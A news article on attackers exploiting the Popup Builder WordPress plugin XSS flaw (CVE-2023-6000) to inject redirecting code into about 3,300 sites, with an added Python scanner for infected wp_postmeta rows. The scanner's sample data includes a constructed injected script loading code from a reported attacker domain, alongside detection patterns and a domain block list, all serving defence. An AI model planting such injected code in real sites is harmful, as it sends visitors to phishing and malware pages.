WordPress Plugin Flaw: Hackers Infected 3,300 Sites With Malware

Hackers are not wasting any time these days: they have just exploited a WordPress plugin flaw to infect 3,300 sites with malware. Here are the latest reports on the matter.

WordPress plugin flaw exploited

According to new reports, hackers breached WordPress sites by exploiting a vulnerability in outdated versions of the Popup Builder plugin. The result is 3,300 websites infected with malicious code.

A cross-site scripting (XSS) vulnerability tracked as CVE-2023-6000 was exploited in the attacks. It affects Popup Builder versions 4.2.3 and older, and was disclosed in November 2023.

Bleeping Computer notes that a Balada Injector campaign uncovered at the start of this year exploited the same vulnerability to infect over 6,700 websites, which shows that many site admins had not patched quickly enough.

According to the same report, Sucuri has spotted a brand new campaign that has seen a significant uptick over the past three weeks.

It targets the very same vulnerability in the WordPress plugin.

As noted by the PublicWWW results, “code injections linked to this latest campaign are to be found in 3,329 WordPress sites, with Sucuri’s own scanners detecting 1,170 infections.”

Malicious code is injected into the Custom JavaScript or Custom CSS sections of the WordPress admin interface and stored within the ‘wp_postmeta’ database table.

It is also worth noting that the injected code mainly acts as event handlers for various Popup Builder plugin events, such as ‘sgpb-ShouldOpen’, ‘sgpb-ShouldClose’, ‘sgpb-WillOpen’, ‘sgpbDidOpen’, ‘sgpbWillClose’, and ‘sgpb-DidClose’.

As a result, the malicious code runs when the plugin fires those events, for example at the moment a popup opens or closes.

Sucuri has stated that the injections’ primary purpose seems to be redirecting visitors of infected sites to malicious destinations, such as phishing pages and malware-dropping sites. However, the exact actions of the code may vary.

Bleeping Computer stated that the attacks come from the domains “ttincoming.traveltraffic[.]cc” and “host.cloudsonicwave[.]com,” so blocking these two domains is recommended.
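To make the detection side concrete, here is an added Python example (not code from this article, from Sucuri, or from the Popup Builder project) that scans rows shaped like the ‘wp_postmeta’ table for custom JavaScript or CSS that hooks the Popup Builder events listed above and loads a script from, or redirects to, an external host. The sample rows and the meta_key names are constructed assumptions; the two domains are the ones named in the report, written without the defanging brackets so they can be matched.

```python
"""Scan exported wp_postmeta rows for injected Popup Builder event handlers.

Added example for illustration only: the meta_key names and the sample rows
are constructed assumptions, not taken from the plugin or from a real site.
"""
import re
from dataclasses import dataclass

# Event names the report says the injected code hooks.
SGPB_EVENTS = (
    "sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpb-WillOpen",
    "sgpbDidOpen", "sgpbWillClose", "sgpb-DidClose",
)

# Domains named in the report (defanging brackets removed for matching).
KNOWN_BAD_DOMAINS = ("ttincoming.traveltraffic.cc", "host.cloudsonicwave.com")

# Generic signs of pulling in a remote script or sending the browser elsewhere.
EXTERNAL_LOAD_RE = re.compile(
    r"""(createElement\(\s*['"]script['"]\s*\)|\.src\s*=|location(\.href)?\s*=|import\(|@import)""",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass
class Finding:
    meta_id: int
    post_id: int
    meta_key: str
    severity: str
    reasons: list


def scan_meta_value(value: str):
    """Return (severity, reasons) for one meta_value; severity is None if clean."""
    reasons = []
    events = [e for e in SGPB_EVENTS if e in value]
    if events:
        reasons.append("hooks Popup Builder events: " + ", ".join(events))
    hosts = {h.lower() for h in URL_RE.findall(value)}
    bad = sorted(h for h in hosts if h in KNOWN_BAD_DOMAINS)
    if bad:
        reasons.append("references reported domains: " + ", ".join(bad))
    external = EXTERNAL_LOAD_RE.search(value) is not None
    if external:
        reasons.append("loads a script or redirects the browser")
    if bad:
        return "high", reasons          # a reported domain is enough on its own
    if events and external:
        return "medium", reasons        # event hook plus outbound load/redirect
    return None, reasons


def scan_rows(rows):
    """rows: iterable of (meta_id, post_id, meta_key, meta_value) tuples."""
    findings = []
    for meta_id, post_id, meta_key, meta_value in rows:
        if not isinstance(meta_value, str):
            continue
        severity, reasons = scan_meta_value(meta_value)
        if severity:
            findings.append(Finding(meta_id, post_id, meta_key, severity, reasons))
    return findings


# Constructed sample rows (meta_key names are assumptions, not the plugin's real keys).
SAMPLE_ROWS = [
    # benign handler that only logs
    (1, 101, "sg_popup_custom_js",
     "jQuery(window).on('sgpb-DidClose', function(){ console.log('closed'); });"),
    # benign custom CSS
    (2, 101, "sg_popup_custom_css", ".sgpb-popup-dialog-main-div { border-radius: 6px; }"),
    # suspicious: hooks an event and injects a script from a reported domain
    (3, 102, "sg_popup_custom_js",
     "jQuery(document).on('sgpb-ShouldOpen', function(){"
     "var s=document.createElement('script');s.src='https://ttincoming.traveltraffic.cc/placeholder.js';"
     "document.head.appendChild(s);});"),
    # suspicious: event handler that redirects to an unknown host
    (4, 103, "sg_popup_custom_js",
     "jQuery(document).on('sgpbWillClose', function(){ window.location.href='https://example.invalid/landing'; });"),
    # unrelated post meta
    (5, 104, "_edit_lock", "1700000000:1"),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"[{f.severity}] meta_id={f.meta_id} post_id={f.post_id} key={f.meta_key}")
        for r in f.reasons:
            print("   -", r)
```

On a real site the rows would come from a database export of ‘wp_postmeta’ (the meta_key filter to use depends on how the installed plugin version stores its custom JavaScript and CSS, which this article does not specify). A “medium” hit is a prompt for manual review, not proof of compromise: legitimate customisations also hook these events, so the combination with a remote load or redirect is what makes a row worth inspecting.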

If you’re using the Popup Builder plugin on your site, upgrade to the latest version, currently 4.2.7, which addresses CVE-2023-6000 and other security problems.

“WordPress stats show that at least 80,000 active sites currently use Popup Builder 4.1 and older, so the attack surface remains significant,” according to the online publication mentioned above.

Because so many sites run WordPress, the issue is highly significant and should be addressed as quickly as possible.

Rada Mateescu
I'm hungry for truth, thirsty to learn, and eager to share. At Optic Flux, my goal is to deliver breaking juicy health, financial, and tech/science-related content. I focus on all that's meaningful and impactful for my readers.